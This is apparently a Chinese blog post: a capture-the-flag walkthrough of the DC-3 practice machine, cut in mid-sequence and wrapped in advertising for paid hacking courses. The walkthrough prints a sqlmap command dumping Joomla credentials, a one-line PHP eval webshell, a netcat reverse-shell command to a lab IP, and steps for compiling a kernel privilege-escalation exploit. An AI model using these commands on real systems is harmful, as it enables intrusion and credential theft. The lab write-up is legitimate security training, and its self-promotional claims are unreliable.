DC3靶机练习,2024年最新靠这份网络安全知识点PDF成功跳槽

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文



[![](https://img-blog.csdnimg.cn/img_convert/d257066f4e2a749a19f98a0e3e0bfc86.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161609244-1373164183.png)


##### 4.我们爆username,和password



sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D ‘joomladb’ -T ‘#__users’ -C ‘username,password’ --dump -p list[fullordering]



[![](https://img-blog.csdnimg.cn/img_convert/9e5b5303f8821310c96151b3dcd38c41.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161619374-364426582.png)


得到密码不过密码是hash加密


##### 5.john爆破



[![](https://img-blog.csdnimg.cn/img_convert/d76a24c3997d55c50098b75f2a635dfa.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161630894-690286466.png)


##### 6.登陆进去



[![](https://img-blog.csdnimg.cn/img_convert/a6b3f8f4bea545851f3327fd50c3c281.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161642991-811351378.png)


这个时候我们想起我们扫描的目录



[![](https://img-blog.csdnimg.cn/img_convert/5b90933d665d75c94bc36a7eed0fb4ee.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161656984-1247039469.png)


我们找到了这个目录



[![](https://img-blog.csdnimg.cn/img_convert/a4405489c2c9e5ca840c0ad7eeb977a6.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161709139-1131934629.png)


[Top]( )


### 四.文件上传



#### 1.我们在beez3的下面找到了可以上传的地方



[![](https://img-blog.csdnimg.cn/img_convert/4a04ea7fe5a4c8c6f3f91191802b4f29.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161723583-1563876879.png)


我们在html的目录下写入text.php



#### 2.在text.php中加入木马文件


text.php



echo “a”;

<?php @eval($_POST['a'])?>


#### 3.访问木马文件



> 
> [http://10.0.2.19/templates/beez3/html/text.php]( )
> 
> 
> 


显示



[![](https://img-blog.csdnimg.cn/img_convert/b739733cc263b5bd451810fa67505a12.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161740518-49940846.png)


显示出来这个说明我们的木马文件写入进去了


成功写入蚁剑



[![](https://img-blog.csdnimg.cn/img_convert/3b7e59daca1b0a98ef49c3408e99616d.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161751252-603903352.png)



#### 4.终端中执行命令



[![](https://img-blog.csdnimg.cn/img_convert/5174d587fa88e0f0ec0e974ba1c3d15d.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161804260-1869838782.png)



rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.8 4444 >/tmp/f
命令解释 rm /tmp/f删除文件
mkfifo /tmp/f
FIFO 是一种特殊类型的文件,用于在不同的进程之间进行通信。它的工作原理类似于队列,数据按照先进先出的顺序传输。
通过使用命名管道,可以实现多个进程之间的数据传输。一个进程可以将数据写入命名管道,另一个进程可以从命名管道读取这些数据。这种通信方式可以用于各种目的,例如在多个程序之间共享数据、进程间通信等。
cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.8 4444 >/tmp/f
它将创建一个名为 /tmp/f 的文件,将该文件中的内容通过一个管道传递给 /bin/bash 命令,使得 /bin/bash 命令可以以交互式 Shell 的形式运行。然后,命令将通过网络连接(使用 nc 命令)将 /bin/bash 命令的输出重定向到 IP 地址为 10.0.2.8,端口为 4444 的远程主机上。同时,命令将 /bin/bash命令的输入重定向回 /tmp/f 文件中


简单来说就是我们通过用nc反弹到主机上将/bin/bash输入上



#### 5.nc反弹


反弹成功



[![](https://img-blog.csdnimg.cn/img_convert/8dd6adb1dd3dafcf2f4539e24cb2b0f2.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161814258-1959775093.png)


我们要得到root权限


[Top]( )


### 五.提权



#### 1.我们sudo -l看是否有可以用的



[![](https://img-blog.csdnimg.cn/img_convert/8bc4336410fdc5542db15c97d06d7bc7.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161824694-1352602981.png)



#### 2.我们查看内核



[![](https://img-blog.csdnimg.cn/img_convert/e353849d99cd92b01947524c1b763d02.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161835855-1728563407.png)


ng)


我们看到内核版本


看luinx版本



[![](https://img-blog.csdnimg.cn/img_convert/432e47cd18b1a240f73b0780eef8628f.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161847706-2024896861.png)



#### 3.searchsploit 查询版本漏洞



[![](https://img-blog.csdnimg.cn/img_convert/17ca1a06e96d55b9deca7bad6f713e7e.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161903328-1189481960.png)


我们用searchsploit -x linux/local/39772.txt来查看在最后面有下载地址



[![](https://img-blog.csdnimg.cn/img_convert/f27a9ec8e28e07fda440186a9944efba.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161914665-1385081061.png)



#### 4.我们在本地开启服务


我用我的kali机下载到了本地的桌面上


我们在本地开启服务



[![](https://img-blog.csdnimg.cn/img_convert/5f434efef448496cbba00bb0af198176.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161924973-1244903197.png)


在浏览器访问一下我们发现了访问地址



[![](https://img-blog.csdnimg.cn/img_convert/aea96218e63e7439b8cd4642a0e1c2de.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161936336-362508569.png)



#### 5.我们在反弹的机上使用



[![](https://img-blog.csdnimg.cn/img_convert/a45224cb24e430c5b1ffdb04b5bdea85.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161953540-110778882.png)



unzip 39772.zip
cd 39772
ls
tar xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit



[![](https://img-blog.csdnimg.cn/img_convert/4ec643920b8c232900509d5593602a73.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162012471-1720575394.png)



[![](https://img-blog.csdnimg.cn/img_convert/2ead85488ab803bae483b4a08ca4267e.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162025496-871753693.png)



#### 6.对文件complie.sh加权限



[![](https://img-blog.csdnimg.cn/img_convert/d2720b657d9322e2a1db6d8a22a02b94.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162036185-1418742171.png)


编译文件



[![](https://img-blog.csdnimg.cn/img_convert/4ef6cd6288a16a4139ecdddb338c0c57.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162046557-694628150.png)



#### 7.查看文件



[![](https://img-blog.csdnimg.cn/img_convert/55c4413b2a2fcf358c66e66100b4d6b2.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162056210-1124345749.png)



#### 8.提取文件



[![](https://img-blog.csdnimg.cn/img_convert/754b7b6aaf699b694d1c6ea58392a69f.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162106834-1733822562.png)



### 如何自学黑客&网络安全


#### 黑客零基础入门学习路线&规划


**初级黑客**  
 **1、网络安全理论知识(2天)**  
 ①了解行业相关背景,前景,确定发展方向。  
 ②学习网络安全相关法律法规。  
 ③网络安全运营的概念。  
 ④等保简介、等保规定、流程和规范。(非常重要)


**2、渗透测试基础(一周)**  
 ①渗透测试的流程、分类、标准  
 ②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking  
 ③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察  
 ④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等


**3、操作系统基础(一周)**  
 ①Windows系统常见功能和命令  
 ②Kali Linux系统常见功能和命令  
 ③操作系统安全(系统入侵排查/系统加固基础)


**4、计算机网络基础(一周)**  
 ①计算机网络基础、协议和架构  
 ②网络通信原理、OSI模型、数据转发流程  
 ③常见协议解析(HTTP、TCP/IP、ARP等)  
 ④网络攻击技术与网络安全防御技术  
 ⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现


**5、数据库基础操作(2天)**  
 ①数据库基础  
 ②SQL语言基础  
 ③数据库安全加固


**6、Web渗透(1周)**  
 ①HTML、CSS和JavaScript简介  
 ②OWASP Top10  
 ③Web漏洞扫描工具  
 ④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)  
 恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k


到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?


如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!


**7、脚本编程(初级/中级/高级)**  
 在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.


如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

**8、超级黑客**  
 这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。  
 ![img](https://img-blog.csdnimg.cn/img_convert/3fd39c2ba8ec22649979f245f4221608.webp?x-oss-process=image/format,png)


#### 网络安全工程师企业级学习路线


![img](https://img-blog.csdnimg.cn/img_convert/931ac5ac21a22d230645ccf767358997.webp?x-oss-process=image/format,png)  
 如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的


视频配套资料&国内外网安书籍、文档&工具


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

![img](https://img-blog.csdnimg.cn/img_convert/153b2778a3fe5198265bed9635d63469.webp?x-oss-process=image/format,png)  
 一些笔者自己买的、其他平台白嫖不到的视频教程。  
 ![img](https://img-blog.csdnimg.cn/img_convert/32eb4b22aa740233c5198d3c161b37e8.webp?x-oss-process=image/format,png)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/b42e4daa44cd0b476d2755b9e5556e73.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  
 ![img](https://img-blog.csdnimg.cn/img_convert/32eb4b22aa740233c5198d3c161b37e8.webp?x-oss-process=image/format,png)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-roOKQNWW-1713125836362)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值